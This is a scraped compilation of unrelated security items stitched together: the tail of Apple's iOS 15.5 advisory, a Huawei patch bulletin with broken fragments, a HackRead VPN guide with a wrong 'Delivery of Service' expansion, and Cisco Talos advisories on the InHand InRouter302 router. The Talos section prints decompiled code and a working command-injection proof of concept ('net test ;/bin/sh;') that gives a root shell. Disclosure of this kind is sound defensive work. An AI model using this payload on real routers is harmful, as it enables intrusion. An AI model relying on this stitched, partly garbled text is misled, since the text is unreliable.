5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs(@starlabs_sg)KernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An application may be able to execute arbitrary code withkernel privilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-26757: Ned Williamson of Google Project ZeroKernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: An attacker that has already achieved kernel code executionmay be able to bypass kernel memory mitigationsDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)KernelAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious attacker with arbitrary read and write capabilitymay be able to bypass Pointer AuthenticationDescription: A race condition was addressed with improved statehandling.CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)LaunchServicesAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A sandboxed process may be able to circumvent sandboxrestrictionsDescription: An access issue was addressed with additional sandboxrestrictions on third-party applications.CVE-2022-26706: Arsenii Kostromin (0x3c3e)libxml2Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote attacker may be able to cause unexpected applicationtermination or arbitrary code executionDescription: A use after free issue was addressed with improvedmemory management.CVE-2022-23308NotesAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing a large input may lead to a denial of serviceDescription: This issue was addressed with improved checks.CVE-2022-22673: Abhay Kailasia (@abhay_kailasia) of Lakshmi NarainCollege Of Technology BhopalSafari Private BrowsingAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious website may be able to track users in Safariprivate browsing modeDescription: A logic issue was addressed with improved statemanagement.CVE-2022-26731: an anonymous researcherSecurityAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious app may be able to bypass signature validationDescription: A certificate parsing issue was addressed with improvedchecks.CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)ShortcutsAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A person with physical access to an iOS device may be able toaccess photos from the lock screenDescription: An authorization issue was addressed with improved statemanagement.CVE-2022-26703: Salman Syed (@slmnsd551)WebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead to codeexecutionDescription: A memory corruption issue was addressed with improvedstate management.WebKit Bugzilla: 238178CVE-2022-26700: ryuzakiWebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A use after free issue was addressed with improvedmemory management.WebKit Bugzilla: 236950CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghuawingtecher labWebKit Bugzilla: 237475CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghuawingtecher labWebKit Bugzilla: 238171CVE-2022-26717: Jeonghoon Shin of TheoriWebKitAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedstate management.WebKit Bugzilla: 238183CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun LabWebKit Bugzilla: 238699CVE-2022-26719: Dongzhuo Zhao working with ADLab of VenustechWebRTCAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: Video self-preview in a webRTC call may be interrupted if theuser answers a phone callDescription: A logic issue in the handling of concurrent media wasaddressed with improved state handling.WebKit Bugzilla: 237524CVE-2022-22677: an anonymous researcherWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may disclose restricted memoryDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-26745: an anonymous researcherWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to elevate privilegesDescription: A memory corruption issue was addressed with improvedstate management.CVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR TeamWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A remote attacker may be able to cause a denial of serviceDescription: This issue was addressed with improved checks.CVE-2015-4142: Kostya Kortchinsky of Google Security TeamWi-FiAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2and later, iPad 5th generation and later, iPad mini 4 and later, andiPod touch (7th generation)Impact: A malicious application may be able to execute arbitrary codewith system privilegesDescription: A memory corruption issue was addressed with improvedmemory handling.CVE-2022-26762: Wang Yu of CyberservalAdditional recognitionAppleMobileFileIntegrityWe would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRingfor their assistance.FaceTimeWe would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRingfor their assistance.WebKitWe would like to acknowledge James Lee, an anonymous researcher fortheir assistance.Wi-FiWe would like to acknowledge 08Tc3wBB of ZecOps Mobile EDR Team fortheir assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.5 and iPadOS 15.5".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TQACgkQeC9qKD1prhh9PRAApeuHnWvZRxSW/QArItDF2fA1eXCu7n9BwPA6CoqrU7v7aR6H/NQ3wes6xOjoRccHRCWRJ12RubM06ggC+WA/MLb96t2Wc4IUoFDkI3G6fp/I3aHpSONv4YMtEoHSGMpJ3qAb6Z60mIMcshsCtyv9k4LxpjOTnHKRLp/M4JLWG4CanOGpN2u/wPPVTpRY4jkZlAdvQK3qrPmA8aO5sWnbh5l//kUS6IL649seZQFUeZdz7QUyodjjqr2/XWyqsQC4mqVphxwvWDWA5J6/Zf7C7hNdZ1BE+SPpLhjEZlU6IYBFY2PLrg9NDTv8YMZpftlm5HQo3qmy/HLoiF8bIqgtdz+TpgNiT+TYz9+/pvP/hyGbX6xF9esKBVjj+1OUnd2GaLjSdY7o9WOtZgSJQxi1/R1X1+DjY1vI+d/TQZ+Sz58Me90R99aWc+Gc1B8e6FhjwT48rHJiuIw75ZW1orpUX6OL5vqdge0H1aJXm7EEUhByZvm2E2DajKu2mp2jr01UZyb3ro0qE1zpNitNORWAdvrlriIJxFVxtxW4MygMn8ThJ/Jz2LjquHvTEwvCyB9jaqPKja3b/dwzf/nowjw+aocxOjelW2Q/HcyR13YF2ZHd1+hNtG/7IsrxWIpI9nNAQQ2LCQIgL7/xCn6Yni9t3le3+eU+cdafoqJKTpETNbk==OMfW-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-1

The frame scheduling module has a null pointer dereference vulnerability. Successful exploitation of this vulnerability will affect the kernel availability.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the April 2022 Android security bulletin:

Critical: CVE-2021-35081

High: CVE-2021-0694, CVE-2021-39795, CVE-2021-39803, CVE-2021-39804, CVE-2021-39794, CVE-2021-39796, CVE-2021-39808, CVE-2021-39809, CVE-2021-30334, CVE-2021-35130, CVE-2021-0707, CVE-2021-39800, CVE-2021-39801, CVE-2021-39776

Medium: CVE-2021-39771, CVE-2021-35071, CVE-2021-39739, CVE-2021-39741, CVE-2021-39748, CVE-2021-39759, CVE-2021-39760, CVE-2021-39762, CVE-2021-39763, CVE-2021-39764, CVE-2021-39774, CVE-2021-39777, CVE-2021-39781, CVE-2021-39746, CVE-2021-39757, CVE-2021-39786

Low: none

Already included in previous updates: CVE-2021-30276, CVE-2021-30285, CVE-2021-39690, CVE-2022-20047, CVE-2022-20048, CVE-2021-1918, CVE-2021-30267, CVE-2021-30268, CVE-2021-30269, CVE-2021-30270, CVE-2021-30271, CVE-2021-30273, CVE-2021-30283, CVE-2021-30289, CVE-2021-30293, CVE-2021-30303, CVE-2021-30287, CVE-2021-30300, CVE-2021-30301, CVE-2021-30307, CVE-2021-21781, CVE-2021-39715

※For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2021-46785: Improper permission control vulnerability in the Property module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability can result in the obtaining of the unique device identifier.

Acknowledgment: Zhang Qing (ByteDance), Wang Kailong (NUS), and Bai Guang Dong (UQ)

CVE-2021-46789: Configuration defects in the secure OS module

Severity: Medium

Affected versions: EMUI 11.0.1

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2021-46788: Third-party pop-up window coverage vulnerability in the iConnect module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: System pop-up window may be covered to mislead users to perform incorrect operations.

CVE-2021-46787: Improper permission control vulnerability in the AMS module

Severity: High

Affected versions: EMUI 11.0.1, EMUI 12.0.0, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause non-system application processes to crash.

CVE-2021-46786: Insufficient verification of the parameters transferred by the application space in the audio module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause out-of-bounds memory access.

CVE-2021-40010: Heap overflow vulnerability in the bone voice ID trusted application (TA).

Severity: Critical

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may result in malicious code execution.

CVE-2022-22258: Event notification vulnerability in the Wi-Fi module

Severity: Medium

Affected versions: EMUI 10.1.0, EMUI 10.1.1, EMUI 11.0.0, HMOS 2.0.0, Magic UI 3.1.0, Magic UI 3.1.1, Magic UI 4.0.0

Impact: Successful exploitation of this vulnerability may cause third-party apps to intercept and add information and result in elevation-of-privilege.

CVE-2022-29794: UAF vulnerability in the frame scheduling module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect integrity, availability, and confidentiality.

CVE-2022-22261: Unstrict verification of the validity of the weight in the model in hiaiserver

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will cause AI service exceptions.

CVE-2022-29793: Configuration defects in the activation lock of the mobile phone

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2022-29792: Serial number obtaining vulnerability in the chip assembly

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2022-29791: Unstrict verification of the validity of the weight in the model in hiaiserver

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will cause AI service exceptions.

CVE-2022-29790: Service abnormality caused by multi-threaded access to the database in the graphics acceleration service

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may cause service exceptions.

CVE-2022-29789: Unstrict verification of the validity of the property in the model in hiaiserver

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will cause AI service exceptions.

CVE-2022-29795: Null pointer dereference vulnerability in the frame scheduling module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2022-29796: Unstrict verification of the validity of the weight in the model in hiaiserver

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will cause AI service exceptions.

CVE-2022-22260: UAF vulnerability in the kernel module

Severity: Medium

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability will affect integrity and availability.

CVE-2022-29795: May

The Property module has a vulnerability in permission control.This vulnerability can be exploited to obtain the unique device identifier.

CVE-2021-46785: May

By Waqas
A VPN these days is a must as we know it. The recent growth of VPN use has…
This is a post from HackRead.com Read the original post: A Guide to Using VPNs on Your Smartphone

A VPN these days is a must as we know it. The recent growth of VPN use has been pronounced across the globe, particularly in developed economies in the UK and the US.

On these shores, some 44% of UK Internet users (62.86 million people as of December 2021) have used a VPN at some point when online, while 41% of Brits use this type of private network at least once a week.

It’s also clear that VPN use is particularly popular among younger people and smartphone users, with 52% of VPN customers utilizing an iOS device to browse securely online. **_With this in mind, we’ve created a detailed guide to help you use VPNs effectively on your smartphone (regardless of your chosen operating system)._**

**First Up – What is a VPN?**

A VPN describes a virtual private network that can be securely opened within a **_public_** network connection, enabling users to send, receive and access content with true anonymity and peace of mind.

**But how exactly does a VPN work? **

Well, it effectively creates a virtual encrypted tunnel between two servers, presenting any data sent from a protected device as a random and completely indecipherable string of code.

In addition to encrypting your content, a VPN also masks the sender’s unique IP address and real-time location, making this information invisible to anyone else who may be on the network (including the manager). 

Typically, VPNs are used to hide your geographical location and access restricted content libraries available through streaming platforms like Netflix. The content available through this type of platform will vary from one jurisdiction to another, thanks largely to licensing agreements and any associated restrictions that are in place.

With a VPN, however, you can mask your precise location and access content without such restrictions, allowing you to enjoy the full Netflix library wherever you may be in the world.

**OK, But Why Do I Need a VPN on my Android or iOS Device?**

Typically, VPNs are synonymous with PC and laptop usage, but as we’ve already touched on, they’re increasingly popular among Android and iOS owners. **_This also applies to the streaming of content and live broadcasts, with mobile fast becoming our go-to channel for accessing our favorite shows._**

This trend is prevalent in both the UK and the US, with 71% of streaming viewers stateside now regularly accessing content on at least two devices (primarily smartphones and CTV). Both devices are considerably more popular than PCs for streaming content in the digital age, so Android and iOS users are increasingly likely to use a VPN to enjoy unrestricted content libraries from across the globe.

This is certainly true among travelers, who are even more likely to stream content through their smartphone of choice when heading overseas. Depending on where you’re traveling, however, you’ll find various restrictions in place, from complete blocks on social media sites like Instagram or Facebook to reduced Netflix libraries with a distinct absence of your favorite shows.

Censorship issues may also prevent you from accessing certain subscription-based video services, but the use of a VPN for Android or iOS can overcome these in a completely secure and legal way.

**_Interestingly, there are other_** **_benefits of installing the best VPN for your Android_** **_or iOS device._** 

After all, the ability of VPNs to encrypt any data that’s sent out over a network makes it incredibly difficult for hackers to intercept such information, while the mere practice of hiding your IP address and locations makes you less vulnerable to malware and DDoS (Delivery of Service) attacks. 

When you consider the prevalence of tasks such as mobile banking (approximately 50% of adults in the UK regularly use this service and 68% do so on an occasional basis), the need to send out personal information securely and protect login information on smartphones is more pressing than ever before.

**_This is especially true when connecting to public Internet connections through your smartphone when out and about._** 

While on the move, for example, you may find that 4G or even 5G connections may be inconsistent or patchy in certain locations. You can negate this by logging into a public Wi-Fi access point at a local coffee shop or retail outlet, but this type of connection is inherently insecure and vulnerable to the machinations of hackers.

Hackers can certainly create familiar-sounding access points on such networks, through which they can monitor your activity and access potentially sensitive information once you’ve logged in with your smartphone.

Installing a VPN can establish a secure and private connection on a public network, however, meaning that even people who gain access to the network will be unable to view your activity or capture login details and passwords.

On a similar note, a mobile VPN safeguards your privacy and prevents your Internet Service Provider (ISP) from viewing your online activity. The same principle applies to other websites and services that tend to track browsing habits, such as Google and Facebook.

In simple terms, a VPN ensures that you’re constantly accessing websites in private browsing mode, as nobody else active on your network can see what you’re doing or access the content that you’re sharing.

At this stage, it should be noted that while VPNs create relative security and anonymity when using a mobile web browser or app, it **_doesn’t_** prevent website cookies from tracking you and your browsing activity.

However, the capacity of the best Android or iOS VPNs to connect with a vast choice of foreign servers and hide your IP address can feed false information to tracking cookies, creating an additional layer of anonymity when online.

**Choosing a VPN Provider for Your Mobile – The Key Considerations**

If you **_do_** decide to install a reputable VPN on your smartphone, the question that remains is how to choose from the huge range of service providers available in the contemporary marketplace?

The good news is that there are several criteria on which you can base your decision, and we’ve outlined some of these in greater detail below. **_So, let’s get into it!_**

*   **Is the VPN Connection Secure:** This is a basic consideration, but it’s important to ensure that your VPN service provider offers a secure encryption method and strong protocol. In general terms, a secure VPN should utilize 256-bit encryption and OpenVPN protocol (which works on all major operating systems and is particularly effective when bypassing firewalls). Other popular protocols include WireGuard and IKEv2, and checking this information will help you to make an informed decision.

*   **Does the Provide Offer Good Coverage:** There are instances where a VPN can increase latency and slow your Internet connection, especially when providers don’t have broad coverage or multiple server locations. So, you’ll need to prioritize VPN service providers like Surfshark, which currently has over 3,200 servers located in 65 countries across the globe. **_This way, you can access the benefits of a VPN and maintain a consistent connection even when traveling._**

*   **Is There Flexible Pricing Available?:** This is another key consideration, both in terms of the total cost of subscription and the range of payment options provided. After all, you won’t necessarily need to use a VPN all of the time, so you’ll want to consider service providers that offer variable payment plans that cover different time frames. Similarly, you should note that the average VPN subscription costs around $3 per month, so keep this in mind when comparing the market’s prices.

*   **Does the VPN Provider Log Your Activity:** If your primary goal for using a VPN is privacy, you should bear in mind that some service providers keep logs of your activity. This is incredibly counterintuitive, so we’d recommend checking the privacy policies of individual products and reviewing these in detail to see their approach to tracking and usage. This way, you’ll be able to identify a level of privacy that you’re completely comfortable with.

**Setting Up a VPN on Your Smartphone**

Once you’ve identified a viable service provider, the next step is to establish the VPN connection on your iPhone or Android handset.

There are two primary ways to do this, the most popular of which is the most accessible and known for being incredibly user-friendly. To do this, you’ll simply need to purchase a native iteration of the app in the Google Play or Apple store before downloading it and following the individual setup instructions.

Most reputable VPN providers feature native apps on both iOS and Android, while they also simplify the process of saving installation preferences and maintaining (and updating) the applications over time.

The second option is to set up a VPN manually on your smartphone, with this considerably more time-consuming and reliant on you having some kind of knowledge and industry understanding.

However, it also affords you much greater control over your online experience when using a VPN, particularly in terms of the fundamental settings, the scope for customization, and the ability to select your preferred protocol. **_Below, we’ve listed some of the most popular and secure protocols available, including the aforementioned OpenVPN option:_**

*   **OpenVPN:** As we’ve already touched on, this highly configurable, open-source platform is compatible with 256-bit encryption and incredibly effective when bypassing firewalls. It’s also ideal when working with either Android or iOS operating systems, even though it isn’t natively supported on any particular platform. However, the latter point means that you’ll have to install the platform on your smartphone through a third party (which requires additional expertise and knowledge).

*   **WireGuard:** WireGuard is another highly popular and secure VPN protocol and one that only supports UDP (User Datagram Protocol). However, it benefits from incredibly high-speed cryptographic primitives and deep integration with an underlying OS kernel, which translates into high speeds and relatively low overheads. WireGuard delivers higher speeds than those associated with OpenVPN, so you should keep this in mind if it’s a key priority.

*   **IKEv2:** This protocol deserves to be referenced in conjunction with the first two protocols, as it’s similarly popular and boasts impressive speed and security. It’s also particularly compatible with mobile usage, as it can seamlessly shift from one connection type to another (like mobile Internet to Wi-Fi) without compromising security or performance. However, IKEv2 isn’t as widely supported as the first two protocols on our list, while it also lacks standalone encryption and must be installed alongside the IPSec protocol.

*   **IPSec (and L2TP):** While IPSec can be deployed as a standalone protocol, it’s commonly used in conjunction with Layer 2 Tunnel Protocol (L2TP). When combined, these protocols create an easy-to-install and secure option that’s supported natively across a broad range of operating systems including Android and iOS. However, its use of a single port (UDP port 500) makes it easier to block by robust firewalls, making it a less popular and viable option than OpenVPN.

*   **PPTP:** This refers to the ‘Point-to-Point Tunnelling’ protocol, which is supported by the vast majority of operating systems and was first developed by Microsoft during the 90s. While the protocol is still considered to be one of the quickest on the list, it’s also one of the least secure in an age of mobile devices and operating systems. **_Because of this, it’s no longer natively supported by iOS, so it’s not an ideal choice if security is your main priority when surfing online._**

**The Bottom Line**

As we can see, there are various options and protocols to suit the different priorities of smartphone users, whether you want a fast VPN connection or one that offers native operating system support or increased security.

Regardless of your eventual choice, however, there’s no doubt that a mobile VPN is an increasingly valuable tool in an age where smartphones have become a functional and often indispensable part of our everyday lives.

Make no mistake; a VPN can help to secure your most private datasets and make you less vulnerable to certain malware and DDoS attacks. It also helps you to maintain your privacy online, especially when browsing on the move and logging into public networks.

**_It’s also incredibly easy to install and use a mobile VPN on both iOS and Android platforms, so you can take steps to protect yourself even if you’re not the most tech-savvy individual._**

A Guide to Using VPNs on Your Smartphone 

An OS command injection vulnerability exists in the console infactory_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

An OS command injection vulnerability exists in the console infactory\_net functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

Here is the prompt after the login:

    ************************************************
            Welcome to Router console
        Inhand
        Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
        http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    show           -- show system information
    exit           -- exit current mode/console
    ping           -- ping test
    comredirect    -- COM redirector
    telnet         -- telnet to a host
    traceroute     -- trace route to a host
    enable         -- turn on privileged commands
    infactory      -- factory mode
    Router>
    

The infactory command permits, provided the correct password, the access to the factory mode view. This mode permits to change the configuration and perform various tests. The factory mode view:

    Router> infactory 
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
    help           -- get help for commands
    language       -- Set language
    exit           -- exit current mode/console
    reboot         -- reboot system
    factory-model  -- hardware model configure
    modem          -- modem test
    reset-key      -- check the status of the reset button
    com            -- detecting serial ports
    port           -- FCT network port test
    net            -- complete machine network port test
    led            -- LED lights test
    wlan           -- Wi-Fi test
    mem            -- check memory
    hw_wdg         -- check the hardware watchdog status
    dio            -- detect digital I/O
    stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

This mode offers several functionalities. For instance, the net functionality allows to essentially execute a ping command specifying its interface parameter.

The net_functionality:

    undefined4 net_functionality(undefined4 param_1,int args)
    
    {
        [...]
        
        argument_list_ptr[0] = args;
        [...]
        if (argument_list_ptr[0] != 0) {
            first_arg = (char *)maybe_get_next_token(argument_list_ptr);
            if (*first_arg != '\0') {
                is_init = strncmp(first_arg,"init",4);
                if (is_init == 0) {
                    [...]
                }
                is_test = strncmp(first_arg,"test",4);
                if ((is_test == 0) &&
                    (interface = (char *)maybe_get_next_token(argument_list_ptr), 
                    interface != (char *)0x0)) {                                                            [1]
                    max_args = 3;
                    packets_count = 0;
                    timeout_ = 0;
                    target_ip = (char *)0x0;
                    [... here are parsed 3 optional parameters ...]
                    snprintf((char *)&ping_command,0x80,"ping -I %s -c %d -W %d %s",interface,packets_count,
                            timeout,target_ip);                                                             [2]
                    popen_stream = popen((char *)&ping_command,"r");                                        [3]
                    [...]
    }
    

If the first provided argument is test, then the second one, parsed at [1], will be later used at [2] to form the string ping -I <second_arg> -c <packets_count> -W <timeout> <target_ip>. This string will later be used at [3] as argument of the popen function.

The second argument is not properly sanitized, and a command injection can occur at [3]. An attacker, able to reach the net functionality, would be able to obtain a root shell.

**Exploit Proof of Concept**

Provided the command net test ;/bin/sh;, in the factory mode view, a root shell will be obtained:

    Router(factory)# net test ;/bin/sh;
    ping: option requires an argument -- I
    BusyBox v1.26.2 (2022-02-23 16:03:56 CST) multi-call binary.
    
    Usage: ping [OPTIONS] HOST
    help
    Built-in commands:
    ------------------
        . : [ [[ break cd chdir continue echo eval exec exit export false
        hash help history let local printf pwd read readonly return set
        shift source test times trap true type ulimit umask unset wait
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-30 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-26518: TALOS-2022-1501 || Cisco Talos Intelligence Group

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A hard-coded password vulnerability exists in the console infactory functionality of InHand Networks InRouter302 V3.5.37. A specially-crafted network request can lead to privileged operation execution. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

InHand Networks InRouter302 V3.5.37

**Product URLs**

InRouter302 - https://www.inhandnetworks.com/products/inrouter300.html

**CVSSv3 Score**

4.3 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

**CWE**

CWE-259 - Use of Hard-coded Password

**Details**

The InRouter302 is an industrial LTE router. It features remote management functionalities and several security protection mechanism, such as: VPN technologies, firewall functionalities, authorization management and several other features.

The InRouter302 offers the telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console.

    ************************************************
               Welcome to Router console
          Inhand
          Copyright @2001-2020, Beijing InHand Networks Co., Ltd.
          http://www.inhandnetworks.com
    ------------------------------------------------
    Model                : IR302-WLAN
    Serial Number        : RF3022141057203
    Description          : www.inhandnetworks.com
    Current Version      : V3.5.37
    Current Bootloader Version : 1.1.3.r4955
    ------------------------------------------------
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      show           -- show system information
      exit           -- exit current mode/console
      ping           -- ping test
      comredirect    -- COM redirector
      telnet         -- telnet to a host
      traceroute     -- trace route to a host
      enable         -- turn on privileged commands
      infactory      -- factory mode
    Router> 
    

A low-privileged user can login into this service. The Router console contains a command, called infactory. This functionality will request a password; if correct, a menu with several functions is accessed.

The infactory_command:

    undefined4 infactory_command(undefined4 param_1,char *provided_password)
    
    {
     [...]
    
      if ((provided_password == (char *)0x0) || (*provided_password == '\0')) {
        provided_password = password_in_stack;
        uVar2 = get_help_string("input_pass");
        get_pass_wrap(uVar2,provided_password,0x40);
      }
      aes_decrypt_str(<REDACTED>,0x40,decrypted_password,0x80);                                             [1]
      password_len = strlen(decrypted_password);
      iVar1 = strncmp(decrypted_password,provided_password,password_len);                                   [2]
      if (iVar1 == 0) {
        change_view(view_cursor,&view_infactory);                                                           [3]
        return 0;
      }
      [...]
    }
    

This function will first, at [1], decrypt a hard-coded hex encoded string. Then, if the comparison between the described string and the provided password, at [2], returns zero, meaning the two string are equal, then the code at [3] will be reached. Then the “view” will be changed, which means that the available commands will change.

The aes_decrypt_str:

    undefined4 aes_decrypt_str(char *data,uint data_len,char *output_buff)
    {
      [...]
      IV._0_4_ = 0;
      IV._4_4_ = 0;
      IV._8_4_ = 0;
      IV._12_4_ = 0;
      if ((data_len & 0x1f) == 0) {
        __size = (int)data_len / 2;
        data_bin = malloc(__size);
        if (data_bin == (void *)0x0) {
          syslog(3,"out of memory!");
          uVar1 = 0xffffffff;
        }
        else {
          str2bin(data,__size,data_bin);
          AES_set_key(AES_key,<REDACTED>,128);                                                              [4]
          uVar1 = IH_AES_cbc_encrypt(AES_key,data_bin,output_buff,__size,IV,0);
          free(data_bin);
        }
      }
      [...]
    }
    

